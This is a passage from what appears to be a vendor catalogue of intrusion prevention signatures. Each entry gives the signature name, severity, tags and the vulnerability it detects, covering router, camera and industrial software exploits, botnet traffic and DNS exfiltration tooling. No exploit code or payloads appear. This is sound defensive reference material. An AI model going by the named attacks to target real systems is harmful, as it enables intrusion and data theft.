Tags: Any Operating System, Any Hardware, D-Link WBR-1310, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: D-Link-WBR-1310-Authentication-Bypass
Description:
Back to top

HTTP_CRL-D-Link-Wireless-Router-Captcha-Data-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in D-Link Systems DIR-605L detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, D-Link DIR-605L, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-506-5211
Vulnerability: D-Link-Wireless-Router-Captcha-Data-Processing-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Dahua-IP-Camera-Loopback-Authentication-Bypass-CVE-2021-33045

About this situation: An attempt to exploit a vulnerability in Dahua IP camera firmware detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dahua, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Dahua-IP-Camera-Loopback-Authentication-Bypass-CVE-2021-33045
Description:
Back to top

HTTP_CRL-Dahua-IP-Camera-NetKeyboard-Authentication-Bypass-CVE-2021-33044

About this situation: An attempt to exploit a vulnerability in Dahua IP camera firmware detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dahua, CVE2021, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1777-5242
Last changed: sgpkg-ips-1795-5242
Vulnerability: Dahua-IP-Camera-NetKeyboard-Authentication-Bypass-CVE-2021-33044
Description:
Back to top

HTTP_CRL-Dapato-Traffic

About this situation: Dapato traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Dapato
Description:
Back to top

HTTP_CRL-Dasan-GPON-Router-Command-Injection

About this situation: An attempt to exploit a vulnerability in Dasan GPON routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dasan GPON, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Vulnerability: Dasan-GPON-Router-Command-Injection
Description:
Back to top

HTTP_CRL-Dasan-GPON-Routers-Authentication-Bypass-CVE-2018-10561

About this situation: An attempt to exploit a vulnerability in Dasan GPON routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dasan GPON, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Vulnerability: Dasan-GPON-Routers-Authentication-Bypass-CVE-2018-10561
Description:
Back to top

HTTP_CRL-DataLife-Engine-PHP-Code-Injection

About this situation: An attempt to exploit a DataLife Engine PHP Code Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, DataLife Engine, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-781-5211
Vulnerability: DataLife-Engine-PHP-Code-Injection
Description:
Back to top

HTTP_CRL-DC/OS-Marathon-UI-Docker-Exploit

About this situation: A DC/OS Marathon UI Docker Exploit vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, DCOS Marathon, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: DC/OS-Marathon-UI-Docker-Exploit
Description:
Back to top

HTTP_CRL-Ddoser-Bot-Traffic

About this situation: DDoser Bot traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Ddoser-Bot
Description:
Back to top

HTTP_CRL-Dell-EMC-Vmax-Virtual-Appliance-Manager-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in EMC Dell EMC Solutions Enabler Virtual Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dell EMC Solutions Enabler Virtual Appliance, Dell EMC Unisphere for VMAX Virtual Appliance, Dell EMC VASA Virtual Appliance, Dell EMC VMAX Embedded Management, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Dell-EMC-Vmax-Virtual-Appliance-Manager-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Dell-Scriptlogic-Asset-Manager-Getprocessedpackage-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Dell ScriptLogic Asset Manager detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Dell ScriptLogic Asset Manager, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-1343-5242
Vulnerability: Dell-Scriptlogic-Asset-Manager-Getprocessedpackage-SQL-Injection
Description:
Back to top

HTTP_CRL-Dell-SonicWall-Universal-Management-Suite-Imagepreviewservlet-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Dell SonicWALL GMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall GMS, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-833-5242
Last changed: sgpkg-ips-835-5242
Vulnerability: Dell-SonicWall-Universal-Management-Suite-Imagepreviewservlet-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Electronics-Infrasuite-Device-Master-Gextrainfo-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Delta Electronics InfraSuite Device Master detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics InfraSuite Device Master, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1805-5242
Last changed: sgpkg-ips-1805-5242
Vulnerability: Delta-Electronics-Infrasuite-Device-Master-Gextrainfo-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Am_Handler-TP-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1484-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Am_Handler-TP-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Astlistparameters-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Astlistparameters-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Checkiothubnameexisted-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1527-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Checkiothubnameexisted-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-CVE-2022-41133-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DIAEnergie detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1534-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-CVE-2022-41133-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Diae_Phandler-Getobject-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1477-5242
Last changed: sgpkg-ips-1477-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Diae_Phandler-Getobject-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Diae_taghandler.ashx-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Diae_taghandler.ashx-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Dmdsethandler-Order_By-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1504-5242
Last changed: sgpkg-ips-1504-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Dmdsethandler-Order_By-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Ftyinfosetting-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Ftyinfosetting-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-GetDIAE_sloglistparameters-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-GetDIAE_sloglistparameters-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-GetDIAE_unListParameters-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Industrial Automation DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-GetDIAE_unListParameters-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1424-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Handleralarmgroup-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handlerenergytype.aspx-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1394-5242
Last changed: sgpkg-ips-1394-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Handlerenergytype.aspx-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handlerpagep_Kid-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1528-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Handlerpagep_Kid-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Handler_Cfg-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Handler_Cfg-SQL-Injection
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Hierarchyhandler-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Hierarchyhandler-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Insertreg-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1547-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Insertreg-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Putlinemessagesetting-Stored-XSS

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1532-5242
Last changed: sgpkg-ips-1532-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Putlinemessagesetting-Stored-XSS
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-Putshift-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1535-5242
Last changed: sgpkg-ips-1535-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Putshift-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Diaenergie-SQL-Injection-CVE-2024-28891

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-SQL-Injection-CVE-2024-28891
Description:
Back to top

HTTP_CRL-Delta-Industrial-Automation-Dialink-Schedule-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIALink detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIALink, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1434-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Delta-Industrial-Automation-Dialink-Schedule-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-DenyAll-Web-Application-Firewall-Remote-Code-Execution

About this situation: A DenyAll Web Application Firewall Remote Code Execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, DenyAll, CVE2017, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1020-5242
Vulnerability: DenyAll-Web-Application-Firewall-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-DiamondFox-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-700-5211
Vulnerability: DiamondFox-Botnet
Description:
Back to top

HTTP_CRL-Digiever-DS2105-Pro-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in DigiEver DS-2105 Pro detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, DigiEver DS-2105 Pro, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1817-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Digiever-DS2105-Pro-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Digital-Watchdog-Dw-Megapix-Command-Injection-CVE-2022-34538

About this situation: An attempt to exploit a vulnerability in Digital Watchdog DW MEGApix detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Digital Watchdog DW MEGApix, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Vulnerability: Digital-Watchdog-Dw-Megapix-Command-Injection-CVE-2022-34538
Description:
Back to top

HTTP_CRL-Directory-Php-Vulnerability-Access

About this situation: directory.php access
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Any Hardware, PHP, CVE2002, Unix not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-507-5211
Vulnerability: HTTP-Directory-Php-Command-Execution
Description:
Back to top

HTTP_CRL-Dirtjumper-Traffic

About this situation: DirtJumper traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-617-5211
Vulnerability: Bot:-Dirtjumper-Traffic-Detected
Description:
Back to top

HTTP_CRL-Disk-Pulse-Enterprise-Server-Login-Request-Buffer-Overflow

About this situation: An attempt to exploit a Disk Pulse Enterprise Server Login Request Buffer Overflow detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Disk Pulse, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-838-5242
Last changed: sgpkg-ips-1776-5242
Vulnerability: Disk-Pulse-Enterprise-Server-Login-Request-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Django-QuerySet-Order_By-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Django
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Django, CVE2021, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Vulnerability: Django-QuerySet-Order_By-SQL-Injection
Description:
Back to top

HTTP_CRL-Django-Trunc-And-Extract-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Django Software Foundation detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Django, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1489-5242
Last changed: sgpkg-ips-1489-5242
Vulnerability: Django-Trunc-And-Extract-SQL-Injection
Description:
Back to top

HTTP_CRL-Django-Urlize-Urlizetrunc-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Django Software Foundation Django detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Django, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1798-5242
Vulnerability: Django-Urlize-Urlizetrunc-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Django-Usernamefield-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Django detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Django, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1714-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Django-Usernamefield-Denial-Of-Service
Description:
Back to top

HTTP_CRL-Django-Wordwrap-Filter-Denial-Of-Service-CVE-2025-26699

About this situation: An attempt to exploit a vulnerability in Django Software Foundation Django detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Django, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1862-5242
Last changed: sgpkg-ips-1862-5242
Vulnerability: Django-Wordwrap-Filter-Denial-Of-Service-CVE-2025-26699
Description:
Back to top

HTTP_CRL-dnaLIMS-Admin-Module-Command-Execution

About this situation: An attempt to exploit a dnaLIMS Admin Module Command Execution vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, dnaLIMS, CVE2017, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-980-5242
Last changed: sgpkg-ips-980-5242
Vulnerability: dnaLIMS-Admin-Module-Command-Execution
Description:
Back to top

HTTP_CRL-dnaLIMS-Directory-Traversal

About this situation: A dnaLIMS Directory Traversal vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, dnaLIMS, CVE2017, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: dnaLIMS-Directory-Traversal
Description:
Back to top

HTTP_CRL-DNSExfiltrator-Traffic-Over-HTTPS

About this situation: A DNS over HTTPS request associated with DNSExfiltrator tool detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1073-5242
Last changed: sgpkg-ips-1073-5242
Description:
Back to top

HTTP_CRL-Docker-Daemon-Unprotected-TCP-Socket-Exploit

About this situation: A Docker Daemon Unprotected TCP Socket Exploit vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Docker, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1028-5242
Vulnerability: Docker-Daemon-Unprotected-TCP-Socket-Exploit
Description:
Back to top

HTTP_CRL-Dogfood-CRM-Remote-Command-Execution

About this situation: An attempt to exploit a Dogfood CRM Remote Command Execution vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dogfood CRM, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-803-5242
Vulnerability: Dogfood-CRM-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Dolibarr-16-Pre-Auth-Contact-Database-Dump

About this situation: An attempt to exploit a vulnerability in Dolibarr detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dolibarr, Any Operating System not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Dolibarr-16-Pre-Auth-Contact-Database-Dump
Description:
Back to top

HTTP_CRL-Dolibarr-ERP-And-CRM-Card.php-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Dolibarr ERP and CRM Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dolibarr, CVE2024, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1758-5242
